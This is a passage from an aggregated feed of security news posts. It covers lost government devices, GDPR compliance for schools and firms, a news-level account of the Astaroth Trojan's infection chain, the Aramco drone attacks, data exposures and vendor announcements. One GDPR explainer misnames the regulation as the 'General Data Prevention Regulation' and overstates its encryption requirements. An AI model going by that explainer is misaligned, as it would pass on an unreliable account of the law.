They revealed that the two organizations lost a combined 540 devices over the past three financial years: DEFRA accounting for 100 of these and the Environment Agency reporting a total of 440.

Mobile phone losses were most common, with the Environment Agency again losing the lion’s share (363) and DEFRA just 63.

The Environment Agency misplaced 59 laptops over the period, with just 35 going missing from DEFRA, while only 21 tablet computers were lost in total – three from DEFRA and 18 from the Environment Agency.

Yet despite the headline stats, it’s the Environment Agency which appears to be improving its device security processes. It recorded an overall decrease of 24% in lost IT kit over the three-year period, while DEFRA witnessed a 43% increase.

A spokesperson from the Environment Agency played down the findings, claiming they should be seen in the context of the public body’s 10,000+ nationwide staff.

“Due to the nature of our work, we have operational staff working in the field to protect the environment and support our incident response capabilities,” the statement noted.

“Because of this there is always a risk that exposure to threats concerning mobile technology will be increased. All staff are required to work in accordance with our IT and security policies so that we continue to work toward minimizing losses, and risk associated with losses.”

Absolute Software vice-president, Andy Harcup was less forgiving, branding the losses “unbelievable.”

“Every single lost device is a potential goldmine of confidential information and should be properly secured so that if stolen it can be tracked, frozen and recovered,” he argued.

“It’s also critical that government agencies have capabilities in place so that when mobile devices are exposed to threats outside of their control, they are able to locate the devices whether they are on or off the network, and wipe the data on the devices in order to comply with critical regulations like GDPR.”

These are just the latest two government bodies to have had their device security policies scrutinized: the Ministry of Defence recorded a 300% increase in losses of both devices and sensitive data over the past two financial years, according to Absolute Software.

The Top 10 Highest Paying Jobs in Information Security – Part 1

Given a surge in digital threats like ransomware, it is no surprise that the field of information security is booming. Cybersecurity Ventures estimates that there will be 3.5 million job openings across the industry by 2021. Around that same time, the digital economy research firm forecasted that global digital security spending would exceed one trillion […]… Read More

The post The Top 10 Highest Paying Jobs in Information Security – Part 1 appeared first on The State of Security.

Is your school GDPR compliant? Use our checklist to find out

At this year’s ASCL (Association of School and College Leaders) conference, a guest said to us: “The GDPR? Wasn’t that last year?”

Our heads fell into our hands. How was it possible for someone to be so misguided about such a well-publicised regulation? Granted, 2018 was very much ‘the year of the GDPR’ in some circles. It came into effect in May 2018, following much discussion and a last-minute surge from organisations that left compliance until the last minute.

But compliance isn’t a one-time thing. It continues to be effective for any organisation that processes the personal data of, or monitors the behaviour of, EU residents.

A brief summary of the GDPR

The GDPR works like this: there are data subjects (that’s individuals like you and me), and we own our own personal data. The GDPR considers personal data to be anything that identifies, or can be used to identify, a living person, such as your name, National Insurance number or email address, whether it’s a personal or work account.

To GDPR outlines a list of steps organisations must take to protect that information. It also contains eight data subject rights that give individuals more control over the way organisations use their personal data.

These include:

  • The right to access the personal information organisations store on them;
  • The right to request that organisations rectify any information that’s inaccurate or incomplete;
  • The right to erase personal data when it’s no longer necessary or the data was unlawfully processed; and
  • The right to object to processing if the individual believes the organisation doesn’t have a legitimate reason to process information.

Organisations that fail to meet these requirements face fines of up to €20 million (about £18 million) or 4% of their annual global turnover, whichever is greater.

GDPR compliance in schools

Schools have a particularly hard time of it when it comes to the GDPR. They often work with tight budgets and lack the resources to retain a dedicated information security team.

Additionally, schools process large amounts of children’s data, which merits extra protection. In some cases, there are specific rules that apply to children, which means data processors must work out whether the data subject qualifies as a child (defined as under 13 in the UK) before proceeding.

If that’s the case, the data processor must account for requirements concerning:

Can you use consent?

Organisations cannot legally obtain consent from children. Instead, they must seek the approval of a person holding “parental responsibility”, and make “reasonable efforts” to verify that the person providing the consent is indeed a parental figure.

This requirement doesn’t apply in the context of preventive or counselling services offered directly to a child.


Understand your consent requirements >>


Privacy notices

Organisations must ensure that privacy notices targeted at children are written in plain language that could reasonably be understood by data subjects.

This is similar to general rules about privacy notices, but it’s important to remember that the language you use must be appropriate to the intended audience. What’s considered plain language to a 12-year-old will probably be a lot different than, say, a 5-year-old.


Find out more about privacy notices >>


Online services offered to children

In most cases, consent requests for children will relate to online services, or what the GDPR refers to more generally as information society services. These include things such as online shopping, live or on-demand streaming and social networks.

The GDPR states that consent must be closely regulated in these services because children “may be less aware of the risks, consequences and safeguards” of handing over their personal details.

Schools aren’t GDPR-compliant

These are reasonable requirements, but many schools still fail to understand the importance of compliance or make the necessary changes. The ICO (Information Commissioner’s Office) reported that breaches in the education sector increased by 43% in the first three months that the GDPR was effective.

The number of security incidents increased from 355 in the second quarter of 2017­­–18 to 511 in the same period last year. Meanwhile, the number of incidents involving data breaches increased from 239 to 353.

The ICO found that common disclosure issues included:

  • The loss or theft of paper or digital files;
  • Emailing information to the wrong recipient; and
  • Accidental verbal disclosure.

There has also been a sharp increase in the number of cyber attacks targeting schools, with a 69% rise in malware, ransomware and phishing scams between 2017 and 2018.

Mark Orchison, managing director of cyber security firm 9ine, warned that “schools don’t have the internal expertise” to deal with cyber attacks, and they lack “the skills to understand the risks or what to do when [an attack] happens”.

“Schools are seen as an easy target,” he added. “Sending false invoices, for example, is easy money.”

The figures aren’t all bad news, though. Orchison suggested that the rise in data breach reports may well be a case of schools becoming more aware of what breaches are and when they need to be reported.

GDPR checklist for schools

Staying on top of your GDPR compliance requirements can seem daunting, which is why we encourage all organisations to create a plan of action.

Anyone looking for help on what that should include should take a look at our GDPR checklist for schools. It will help you record your school’s progress towards GDPR compliance and identify any areas where development may be required.


A version of this blog was originally published on 28 March 2019.

The post Is your school GDPR compliant? Use our checklist to find out appeared first on IT Governance Blog.

What Does GDPR Mean for Your Organization?

GDPR ,or the General Data Prevention Regulation, is a new law that has been enforced by the European Union since May 25, 2018. The goal of this regulation is to update the Data Protection Directive of 1995; this was was enacted before the widespread use of the internet, which has drastically changed the way data is collected, transmitted, and used.

Another key component of the GDPR is to update regulations about data protection for sensitive personal information. It places an emphasis on the need to protect any and all collected data.

At the core of this new regulation, it aims to simplify, update, and unify the protection of personal data.

Why Does GDPR Matter to You?

The main changes from GDPR mean that companies can no longer be lax about personal data security. In the past, they can get away with simple tick-boxes to achieve compliance. This is no longer the case.

Here are the top points to consider regarding the General Data Prevention Regulation.

  1. A company does not have to be based in the EU to be covered by the GDPR. As long as they collect and use personal data from citizens of the EU, they must adhere to this regulation.
  2. The fines for violating the regulations set forth by the GDPR are huge. Serious infringements such as not having the right customer consent to process their data can net the violating company a fine of 4% of their annual global income, or 20 million Euros — whichever one is bigger.
  3. Personal data definition has become wider and now includes items such as the IP address and identity of their mobile device.
  4. Individuals now have more rights over the use of their personal data for security purposes. Companies can no longer use long-worded terms and conditions in order to obtain explicit consent from their customers to process their data.
  5. GDPR has made technical and organizational measures of protecting personal data to be mandatory. Companies now need to hash and encrypt personal data in order to protect them.
  6. Registries relating to data processing are now mandatory as well. What this means is that organizations need to have a written record (electronically) of all the activities they would do with the personal data, which captures that lifecycle of data processing.
  7. Impact assessments for data protection, such as data profiling, will now be required.
  8. Reporting any and all data breaches is now mandatory. Organizations have a maximum of 72 hours to report a breach in their security, which places personal data at risk. If it poses a high risk for individuals, then it should be reported immediately or without delay.
  9. If an organization processes a large amount of data, they will be required to have a Data Protection Officer, who is in charge of monitoring compliance with the regulation and reports directly to the highest management level of the company.
  10. The GDPR is mainly focused on data protection by design and by default.

There is no doubt that the legal and technical changes the GDPR requires in order to comply at an organizational level is big. Achieving compliance takes more than information security or legal teams alone. It takes the creation of a GDPR task force to find an organization that understands the changes and effects on its operation. They will work together in order to meet compliance requirements set forth by the new regulation.

Also Read,

GDPR: Non-Compliance Is Not An Option

GDPR Compliance And What You Should Know

How Will The GDPR Survive In The Jungle of Big Data?

The post What Does GDPR Mean for Your Organization? appeared first on .

CISO do’s and don’ts: Lessons learned

Keeping a business safe from cyber threats while allowing it to thrive is every CISO’s goal. The task is not easy: a CISO has to keep many balls in the air while being buffeted by an increasingly complex and always shifting threat landscape. Consequently, the importance of a good CISO should not be underestimated. Mistakes to avoid, practices to implement Francesco Cipollone, CISO and director at UK-based cybersecurity consultancy NSC42, says that he has seen … More

The post CISO do’s and don’ts: Lessons learned appeared first on Help Net Security.

Threat visibility is imperative, but it’s even more essential to act

Cyberthreats are escalating faster than many organizations can identify, block and mitigate them. Visibility into the expanding threat landscape is imperative, but according to a new threat report released by CenturyLink, it is even more essential to act. “As companies focus on digital innovation, they are entering a world of unprecedented threat and risk,” said Mike Benjamin, head of CenturyLink’s threat research and operations division, Black Lotus Labs. “Threats continue to evolve, as do bad … More

The post Threat visibility is imperative, but it’s even more essential to act appeared first on Help Net Security.

Tor Project’s Bug Smash Fund raises $86K in August

The Tor Project has raised $86,000 for a Bug Smash fund that it will use to pay developers that will address critical flaws in the popular anonymizing network.

The Tor Project has raised $86,000 for a Bug Smash fund that was created to pay developers that will address critical security and privacy issues in the popular anonymizing network.

In earlier of August, the Tor Project announced the creation of the Bug Smash Fund with the intent to pay professionals that will support the organization in maintaining the work and smashing the bugs.

“The goal of the Bug Smash Fund is to increase the Tor Project’s reserve of funds that allow us to complete maintenance work and smash the bugs necessary to keep Tor Browser, the Tor network, and the many tools that rely on Tor strong, safe, and running smoothly.” reads the announcement published by the Tor Project.

“When we say maintenance and bugs, we are talking about work that is critical—and that we must pay for. This work includes responding quickly to security bugs, improving test coverage, and keeping up with Mozilla’s ESRs. An entire ecosystem relies on us doing so.”

The organization has added donations it received in August 2019 to the Bug Smash Fund.

Any vulnerability that could be used to de-anonymize Tor users or that could be used by attackers to cause a malfunction to the anonymizing network is considered critical and must be addressed rapidly, and part of the Bug Smash Fund will allow paying developers to do it.

The funding project aims to be transparent, any donors can track how that money is being used by the foundation, the Tor Project will tag any bug tickets that utilize the money of the fund with the “BugSmashFund” tag.

“Want to keep up with the work we’re doing with this fund? There are three ways: (1) Follow the “BugSmashFund” trac ticket tag, (2) watch this blog for updates about the progress of these tickets, and (3) make a donation and opt in for our newsletter to get updates directly to your inbox.” concludes the announcement.

“Want to contribute anonymously, with cryptocurrency, or by mail? Here’s how.”

Pierluigi Paganini

(SecurityAffairs – Tor Project, privacy)

The post Tor Project’s Bug Smash Fund raises $86K in August appeared first on Security Affairs.

Astaroth Trojan leverages Facebook and YouTube to avoid detection

Cofense experts uncovered a new variant of the Astaroth Trojan that uses Facebook and YouTube in the infection process.

Researchers at Cofense have uncovered a phishing campaign targeting Brazilian citizens with the Astaroth Trojan that uses Facebook and YouTube in the infection process.

The attach chain appears to be very complex and starts with phishing messages that come with an .htm file attached. At each step of the infection process, threat actors leverage trusted sources and the interaction of the end-user. At every turn in the infection chain, the malware uses legitimate services to evade detection.

Cofense Intelligence™ has identified a phishing campaign targeting Brazilian citizens with the Astaroth Trojan in which Facebook and YouTube profiles are used in support of the infection.” reads the analysis published by Cofense.” There are numerous stages within this infection chain that could have been stopped with properly layered defenses on the email and network security stack. However, at each step of the infection, this campaign uses trusted sources and the end user to help advance to the next stage, ultimately leading to an eventual exfiltration of sensitive information.”

The Astaroth Trojan was first spotted by security firm Cofense in late 2018 when it was involved in a campaign targeting Europe and Brazil. The malware abused living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Console (WMIC) to download and install malicious payloads in the background. According to the experts, LOLbins are very effecting in evading antivirus software. 

In the recent campaign, the experts observed three differed kind of emails written in Portuguese used in this phishing campaign, one using an invoice theme, another with show ticket theme and a third one using civil lawsuit theme.

“This campaign also utilized Cloudflare workers (JavaScript execution environment) to download modules and payloads, negating network security measures. Using these resources adds to the trusted source methodology employed by this campaign to bypass the security stack.” continues the analysis.

Once the victims have clicked on the attachment, the .HTM file downloads a .ZIP archive that contains a malicious .LNK file. The .LNK file then downloads JavaScript code from a Cloudflare workers domain, that in turn downloads multiple modules and payloads that are used to help obfuscate and execute a sample of the Astaroth information-stealer.

Among the files downloaded in the infection process there are two .DLL files that are joined together into a legitimate program named ‘C:\Program Files\Internet Explorer\ExtExport.exe.’

The use of a legitimate program to run the malicious code resulting from the union of the two DLLs downloaded from a trusted source allows bypassing security measures.

“After ExtExport.exe is running with the malicious code side-loaded, it uses a technique known as process hollowing to execute a legitimate program within a suspended state.” continues the expert. Process hollowing is used to inject malicious code retrieved from multiple files downloaded by the earlier JavaScript. The legitimate programs that were targeted for process hollowing were unins000.exe, svchost.exe, and userinit.exe.”

The experts noticed that the Astaroth Trojan involved in this campaign uses YouTube and Facebook profiles to host and maintain the C2 configuration data.

The C2 data are encoded in base64 format as well as custom encrypted, attackers inserted them within posts on Facebook or the profile information about user accounts on YouTube. This trick allows the attackers to bypass content filtering and other network security measures.

“The threat actors are also able to dynamically change the content within these trusted sources so they can deter the possibility of their infrastructure being taken down.” continues the researchers.

The Astaroth storage is able to steal sensitive information, including financial information, stored passwords in the browser, email client credentials, SSH credentials. The information gathered by the malware is encrypted with two layers of encryption and sent via HTTPS POST to a site from the C2 list, experts noticed that most of the sites are hosted on Appspot.

This phishing campaign exclusively targets Brazilians, the experts noticed that the initial .ZIP archive geo-fenced to Brazil.

However, experts warn that attackers could expand their activities to other countries using similar tactics.

“Astaroth leverages legitimate Microsoft Windows services to help propagate and deliver the payloads,” concludes the analysis.. “This campaign also utilized Cloudflare workers (JavaScript execution environment) to download modules and payloads, negating network security measures. Using these resources adds to the trusted source methodology employed by this campaign to bypass the security stack.”

In July, experts at the Microsoft Defender ATP Research Team discoveredfileless malware campaign that is delivering the information stealing Astaroth Trojan.

Pierluigi Paganini

(SecurityAffairs – Astaroth, malware)

The post Astaroth Trojan leverages Facebook and YouTube to avoid detection appeared first on Security Affairs.

Four in five businesses need ways to better secure data without slowing innovation

While data loss protection is critical to Zero Trust (ZT), fewer than one in five organizations report their data loss prevention solutions provide transformational benefits and more than 80 percent say they need a better way to secure data without slowing down innovation, according to Code42. ZT architectures are based on the principle of “trust no one, verify everything,” abolishing the idea of a trusted network within a data security perimeter and requiring companies to … More

The post Four in five businesses need ways to better secure data without slowing innovation appeared first on Help Net Security.

Exploitation of IoT devices and Windows SMB attacks continue to escalate

Cybercriminals upped the intensity of IoT and SMB-related attacks in the first half of 2019, according to a new F-Secure report. The report underscores the threats IoT devices face if not properly secured when online, as well as the continued popularity of Eternal Blue and related exploits two years after WannaCry. F-Secure’s honeypots – decoy servers that are set up to lure in attackers for the purpose of collecting information – measured a twelvefold increase … More

The post Exploitation of IoT devices and Windows SMB attacks continue to escalate appeared first on Help Net Security.

Open source breach and attack simulation tool Infection Monkey gets new features

Guardicore, a leader in internal data center and cloud security, unveiled new capabilities for its Infection Monkey that make it the industry’s first Zero Trust assessment tool. Added features extend the functionality of the already successful Infection Monkey, a free, open source breach and attack simulation tool used by thousands to demonstrate and analyze their environments against lateral movement and attacks. The latest version of Infection Monkey enables both enterprise security leaders and network engineers … More

The post Open source breach and attack simulation tool Infection Monkey gets new features appeared first on Help Net Security.

Only one quarter of retail banks have adopted an integrated approach to financial crime systems

Most banks plan to integrate their fraud and financial crime compliance systems and activities in response to new criminal threats and punishing fines, with the U.K. leading the pack, according to a survey by Ovum, on behalf of FICO. Responses show that U.S. systems are less integrated than Canada’s – only 25 percent of U.S. banks have a common reporting line for both fraud and compliance, versus 60 percent for Canada. The survey also found … More

The post Only one quarter of retail banks have adopted an integrated approach to financial crime systems appeared first on Help Net Security.

Cyber Battle of the Emirates: Training the next generation of cyber security pros

Held annually in Asia, Europe and the Middle East, Hack In The Box conferences bring together the world’s top cyber security experts to share and discuss their latest knowledge, ideas and techniques with security professionals and students. The next HITB event is HITB+ CyberWeek, which takes place October 12th – 17th at Emirates Palace, Abu Dhabi. As usual, it will offer security trainings, talks, and live challenges. Cyber Battle of the Emirates Among the live … More

The post Cyber Battle of the Emirates: Training the next generation of cyber security pros appeared first on Help Net Security.

GDPR One Year Anniversary: The Civil Society Organizations’ View

GDPR is a landmark in privacy jurisdiction. Through its 99 articles, it sets a framework for both businesses and individuals on their rights and responsibilities when it comes to protecting privacy. The most important element in my opinion is that privacy functions a fundamental human right and needs to be protected. The Authorities View Although […]… Read More

The post GDPR One Year Anniversary: The Civil Society Organizations’ View appeared first on The State of Security.

Irdeto launches Trusted Home enabling CSPs to secure the entire smart home beyond the router

Consumer demand for IoT devices is growing rapidly as they look to make the most of connectivity and the smart home. However, the increase in IoT devices also increases the number of security vulnerabilities and creates challenges for communication service providers (CSPs) and consumers alike around control of the smart home. To address these challenges, Irdeto has launched Trusted Home which enables CSPs to secure the entire smart home beyond the router, increase ARPU by … More

The post Irdeto launches Trusted Home enabling CSPs to secure the entire smart home beyond the router appeared first on Help Net Security.

TSYS Authentication Platform helps companies fight synthetic and account takeover fraud

TSYS announced a new authentication product that provides unprecedented real-time verification of customer identities. The new offering, the TSYS Authentication Platform, relies on customer experience data collected from direct cardholder touchpoints and integrates into TSYS clients’ existing authentication systems. TSYS Authentication Platform is available in Europe and will be launched in North America in 2020. The new product is designed to verify that a person is who he or she claims to be, reducing application, … More

The post TSYS Authentication Platform helps companies fight synthetic and account takeover fraud appeared first on Help Net Security.

HITRUST issues guidance for relying on work of internal audit departments in CSF assessments

HITRUST, a leading data protection standards development and certification organization, released updated guidance for placing reliance on the results of previously performed audits, assessments, and inspections. These policy and methodology updates create opportunities for greater assessment efficiency and customer cost savings. HITRUST has historically afforded two opportunities for External Assessors (formerly referred to as HITRUST CSF Assessors) to rely on the results of previously performed control testing, one being Inheritance of the results of other … More

The post HITRUST issues guidance for relying on work of internal audit departments in CSF assessments appeared first on Help Net Security.

New Razberi features use deep packet inspection to monitor video quality and camera security

Razberi Technologies has extended its Razberi Monitor solution with new video health monitoring features. Razberi leverages its patent-pending deep packet inspection technology to assure security professionals that their cameras are providing secure and reliable audio and video streams. Razberi’s latest software automatically reboots cameras and sends alerts when problems are detected. Razberi Monitor provides complete system health and cyber monitoring solutions for video surveillance systems. Razberi Monitor integrates video health with award-winning Razberi CameraDefense for … More

The post New Razberi features use deep packet inspection to monitor video quality and camera security appeared first on Help Net Security.

Easy NX Connect for Egnyte enables fast and secure file sharing

Fujitsu Computer Products of America, the established leader in document imaging, announced a new integration with the FUJITSU fi-7300NX document scanner and Egnyte. Easy NX Connect for Egnyte is a convenient software license that enables organizations to scan directly to Egnyte via a quick tap and scan into a secure, sharable workflow. Easy NX Connect for Egnyte includes NFC authentication and direct integration into Egnyte’s Enterprise File Sharing and Content Governance platform. In conjunction with … More

The post Easy NX Connect for Egnyte enables fast and secure file sharing appeared first on Help Net Security.

Bank Mayapada chooses NICE Actimize to update its AML compliance programs

NICE Actimize, a NICE business and the leader in autonomous financial crime management, has been chosen by PT Bank Mayapada Internasional, Tbk, Jakarta, Indonesia, to launch full-scale improvements within its financial crime operations with anti-money laundering compliance and investigation management solutions that employ artificial intelligence and machine learning technology. To more effectively meet the needs of its regulators, Bank Mayapada will implement an array of components from NICE Actimize’s Autonomous Anti-Money laundering portfolio, including Suspicious … More

The post Bank Mayapada chooses NICE Actimize to update its AML compliance programs appeared first on Help Net Security.

Oliver Wyman and Next Peak offer a broader and enhanced range of advisory and operational services

Global management consulting firm Oliver Wyman and Next Peak, an operational cyber defense consulting company, announced a new collaboration to offer a broader and enhanced range of advisory and operational services to clients focused on defending and improving resilience against global cyber threats. “At a time when cyber threats are becoming increasingly common, more dangerous, and more sophisticated, leaders across all industries are looking for ways to protect their companies,” said Michael Zeltkevic, Partner and … More

The post Oliver Wyman and Next Peak offer a broader and enhanced range of advisory and operational services appeared first on Help Net Security.

Snowflake and FedResults partnership provides cloud-based solutions for government

Snowflake, the data warehouse built for the cloud, announced that it has a public sector distribution relationship with FedResults, a government-focused IT provider. This partnership will enable Snowflake and FedResults to provide secure, powerful, flexible cloud data warehouse and analytics solutions to federal agencies. Bloomberg Government analysts project that the U.S. Federal Government will invest more than $93B in information technology programs in fiscal year 2020. The 2019 Federal Cloud Computing Strategy, Cloud Smart is … More

The post Snowflake and FedResults partnership provides cloud-based solutions for government appeared first on Help Net Security.

Digital River brings its payments, tax and compliance capabilities to Salesforce AppExchange

Digital River announced it has launched an integration to bring its payments, tax and compliance capabilities to Salesforce AppExchange, empowering customers to connect with their customers and partners in entirely new ways. The integration of Salesforce Commerce Cloud and Digital River lets brands create efficient online buying experiences with a solution designed to grow revenue, expand internationally and help protect brands from risks associated with selling online. The on-demand shopping experience is now ingrained in … More

The post Digital River brings its payments, tax and compliance capabilities to Salesforce AppExchange appeared first on Help Net Security.

HID Global acquires HydrantID to secure enterprise data, IT systems, networks, and the IoT

HID Global, a worldwide leader in trusted identity solutions, announced that it has acquired HydrantID, a provider of management and automation services to secure enterprise organizations’ data, IT systems, networks, and the Internet of Things (IoT). Specializing in public key infrastructure (PKI) as a service, HydrantID has issued over three million PKI credentials and secured over 125,000 domains – a perfect complement to HID’s IdenTrust business, which is the world’s leading digital certification authority. HydrantID … More

The post HID Global acquires HydrantID to secure enterprise data, IT systems, networks, and the IoT appeared first on Help Net Security.

Odaseva records growth and supports over a trillion documents in Salesforce

Odaseva, the unified cloud data protection, compliance and operations platform for enterprises running Salesforce as a business-critical application, announced that it has seen triple year over year growth, and after only seven years of operation, supports a staggering one trillion Salesforce records, with over 10 million enterprise-level internal Salesforce customers. Odaseva’s explosive growth is in part due to the influx of new data privacy and governance laws such as GDPR or CCPA, demanding that businesses … More

The post Odaseva records growth and supports over a trillion documents in Salesforce appeared first on Help Net Security.

Week in review: Simjacker attacks, critical Exim flaw, Sandboxie becomes freeware

Here’s an overview of some of last week’s most interesting news, interviews and articles: More than a year after GDPR implementation, half of UK businesses are not fully compliant 52% of UK businesses are not fully compliant with the regulation, more than a year after its implementation, according to a survey of UK GDPR decision-makers conducted on behalf of Egress. Simjacker vulnerability actively exploited to track, spy on mobile phone owners Following extensive research, AdaptiveMobile … More

The post Week in review: Simjacker attacks, critical Exim flaw, Sandboxie becomes freeware appeared first on Help Net Security.

Drone attacks hit two Saudi Arabia Aramco oil plants

Drone attacks have hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia, one of them is the Abqaiq site.

Drone attacks have hit Saudi Arabia’s oil production suffered severe damage following a swarm of explosive drones that hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia.

Online are circulating the images of a huge blaze at Abqaiq, site of Aramco’s largest oil processing plant, the Abqaiq site. A second drone attack hit the Khurais oilfield. Abqaiq is about 60km south-west of Dhahran, while in Khurais, 200km further south-west, there is the second-largest oilfield in the country.

According to the local media, the emergency response of the fire brigade teams allowed to control the fires at both facilities.

Saudi Arabia drone attacks 2
The two facilities are located in Abqaiq and Khurais, Saudi Arabia’s interior ministry said. (Photo: Twitter videograb | @Sumol67)

Iran-backed Houthi rebels in Yemen claimed responsibility for the attacks on the Abqaiq plant, according to a spokesman for the group in Yemen, it had deployed 10 drones in the attacks.

The group is threatening Saudi Arabia of further attacks. The Iran-aligned Houthi rebel movement fights the Yemeni government and a coalition of regional countries led by Saudi Arabia that fights the rebels since 2015, when President Abdrabbuh Mansour Hadi was was kicked out of Sanaa by the Houthis.

“The military spokesman, Yahya Sarea, told al-Masirah TV, which is owned by the Houthi movement and is based in Beirut, that further attacks could be expected in the future.” reported the BBC.

“He said Saturday’s attack was one of the biggest operations the Houthi forces had undertaken inside Saudi Arabia and was carried out in “co-operation with the honourable people inside the kingdom”.”

Secretary of State Mike Pompeo blamed Iran for coordinated the attacks, it added that we are facing an unprecedented attack on the world’s energy supply.

Officials have attributed the attacks to a specific threat actor:

“At 04:00 (01:00 GMT), the industrial security teams of Aramco started dealing with fires at two of its facilities in Abqaiq and Khurais as a result of… drones,” the official Saudi Press Agency reported. “The two fires have been controlled.”

The attacks will have a dramatic impact on Saudi Arabia’s oil supply, it could be cut off 50 percent following the incidents.

These latest attacks demonstrate the potential impact of drone attacks against critical infrastructures, at the time is not clear if the Houthis group use weaponized commercial civilian drones or they obtained military support from Iran.

“The Saudi Air Force has been pummelling targets in Yemen for years. Now the Houthis have a capable, if much more limited, ability to strike back. It shows that the era of armed drone operations being restricted to a handful of major nations is now over.” continues the BBC.

Groups like the Houthis and Hezbollah have access to drone technology and could use it is sophisticated operations. Intelligence analysts fear the escalating tensions in the region that could open a world oil crisis.

Pierluigi Paganini

(SecurityAffairs – drone attacks, Saudi Arabia)

The post Drone attacks hit two Saudi Arabia Aramco oil plants appeared first on Security Affairs.

Security Affairs newsletter Round 231

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

Experts found Joker Spyware in 24 apps in the Google Play store
Toyota Boshoku Corporation lost over $37 Million following BEC attack
University, Professional Certification or Direct Experience?
WordPress 5.2.3 fixes multiple issues, including some severe XSS flaws
Belarusian authorities seized XakFor, one of the largest Russian-speaking hacker sites
China-linked APT3 was able to modify stolen NSA cyberweapons
Stealth Falcon New Malware Uses Windows BITS Service to Stealthy Exfiltrate Data
Stealth Falcons undocumented backdoor uses Windows BITS to exfiltrate data
Symantec uncovered the link between China-Linked Thrip and Billbug groups
Telegram Privacy Fails Again
Wikipedia suffered intermittent outages as a result of a malicious attack
DoS attack the caused disruption at US power utility exploited a known flaw
Million of Telestar Digital GmbH IoT radio devices can be remotely hacked
Police dismantled Europes second-largest counterfeit currency network on the dark web
Robert Downey Jrs Instagram account has been hacked
Adobe September 2019 Patch Tuesday updates fix 2 code execution flaws in Flash Player
Dissecting the 10k Lines of the new TrickBot Dropper
Microsoft Patch Tuesday updates for September 2019 fix 2 privilege escalation flaws exploited in attacks
NetCAT attack allows hackers to steal sensitive data from Intel CPUs
Some models of Comba and D-Link WiFi routers leak admin credentials
The Wolcott school district suffered a second ransomware attack in 4 months
Iran-linked group Cobalt Dickens hit over 60 universities worldwide
LokiBot info stealer involved in a targeted attack on a US Company
SAP September 2019 Security Patch Day addresses four Security Notes rated as Hot News
SimJacker attack allows hacking any phone with just an SMS
Poland to establish Cyberspace Defence Force by 2024
The US Treasury placed sanctions on North Korea linked APT Groups
WatchBog cryptomining botnet now uses Pastebin for C2
Expert disclosed passcode bypass bug in iOS 13 a week before its release
Hackers stole payment data from Garmin South Africa shopping portal
InnfiRAT Trojan steals funds from Bitcoin and Litecoin wallets

Pierluigi Paganini

(SecurityAffairs – Newsletter, hacking)

The post Security Affairs newsletter Round 231 appeared first on Security Affairs.

Delaler Leads, a car dealer marketing firm exposed 198 Million records online

Researcher discovered an unsecured database exposed online, belonging to car dealership marketing firm Dealer Leads, containing 198 million records.

The researcher Jeremiah Fowler discovered an unsecured database exposed online that belong to car dealership marketing firm Dealer Leads.

The archive containing 198 million records for a total of 413GB of data containing information of potential car buyers, vehicles, loan and finance inquiries, log data with IP addresses of visitors, and more.

“On August 19th I reported a non-password protected database that contained a massive 413GB of data and a total of 198 million records. The most shocking part was that I had seen this dataset several times in the previous weeks, but was unable to identify the owner.” reports Security Discovery. “I spent several days trying to identify the owner of the database and there was no clear indication in the millions of records.”

Dealer Leads provides content relevant and related to the auto industry for franchise and independent car dealerships, the website of the company describes itself with the following statement.

“dominates the automotive digital marketing industry with highly used automobile search strings turned into online inventory advertising classified sites, service sites, finance sites etc. Car shoppers have needs, and DealerLeads matches those needs in live searches.”

The Elastic database was accessible to anyone with any browser, its records included name, email, phone, address, IP, and other sensitive or identifiable information, in plain text.

The archive also included IP addresses, ports, pathways, and storage info.

The good news is that after the expert reported his discovery to the company, it has secured the database restricting public access to the archive.

At the time of writing it is not clear how long the data remained exposed online and if someone had access to its records.

“Dealer Leads acted fast to restrict public access immediately after the notification. Unfortunately, the data was exposed for an undetermined length of time and it is unclear who else may have had access to the millions of records that were publicly exposed.” Security Discovery concludes.

“It is unclear if Dealer Leads has notified individuals, dealerships, or authorities about the data incident. Because of the size and scope of the network applicants and potential customers may not know if their data was exposed,”

Pierluigi Paganini

(SecurityAffairs – hacking, data leak)

The post Delaler Leads, a car dealer marketing firm exposed 198 Million records online appeared first on Security Affairs.

A bug in Instagram exposed user accounts and phone numbers

Facebook addressed a vulnerability in Instagram that could have allowed attackers to access private user information.

The security researcher @ZHacker13 discovered a flaw in Instagram that allowed an attacker to access account information, including user phone number and real name.

ZHacker13 discovered the vulnerability in August and reported the issue to Facebook that asked for additional time to address the issue. The social network giant has finally fixed the flaw.

“In putting this article together, I had the security researcher run tests on the platform and he successfully retrieved “secure” user data I know to be real. This data included users’ real names, Instagram account numbers and handles, and full phone numbers.” reads a post published by Forbes. “The linking of this data is all an attacker would need to target those users. It would also enable automated scripts and bots to build user databases that could be searched, linking high-profile or highly-vulnerable users with their contact details.”

The expert also warns that attackers could use automated scripts and bots to collect user data from the platform, linking users with their contact details.

Just a week before ZHacker13 disclosed the bug, phone numbers associated with 419 million accounts of the social network giant were exposed online.

It is not clear if the two incidents could have the same root cause.

“I found a high vulnerability on Instagram that can cause a serious data leak,” @ZHacker13 told to Forbes. “The vulnerability is still active—and it looks like Facebook are not very serious about pathing it.” Exploiting this vulnerability would enable an attacker using an army of bots and processors to build a searchable/ attackable database of users, bypassing protections protecting that data.”

The expert explained that he discovered by flaw by using the platform’s contact importer in combo with a brute-force attack on its login form.

The attack scenarios is composed of two steps:

  • The attacker carries out a brute force attack on Instagram’s login form, checking one phone number at a time for those linked to a live Instagram account.
  • The attacker finds the account name and number linked to the phone number by exploiting Instagram’s Sync Contacts feature.

A Facebook spokesman explained that his company modified the contact importer in Instagram to address the flaw.

we have changed the contact importer on Instagram to help prevent potential abuse. We are grateful to the researcher who raised this issue, and to the entire research community for their efforts.” said the spokesman.

Facebook, after initial resistance, confirmed it is evaluating to reward @ZHacker13 for reporting the bug as part of its bug bounty program.

“Facebook had also told @ZHacker13 that although the vulnerability was serious, there was internal awareness of the issue and so it was not eligible for a reward under the bounty scheme.” continues the post. “This would have set a terrible precedent and disincentivized researchers from coming forwards with similar vulnerabilities. I questioned Facebook on its decision, and the company reconsidered and told me it has “reassessed” the discovery of the bug and would reward the researcher after all. “

Facebook pointed out that there is no evidence that any user data has been abused by threat actors.  

Pierluigi Paganini

(SecurityAffairs – Instagram, hacking)

The post A bug in Instagram exposed user accounts and phone numbers appeared first on Security Affairs.

Upcoming Speaking Engagements

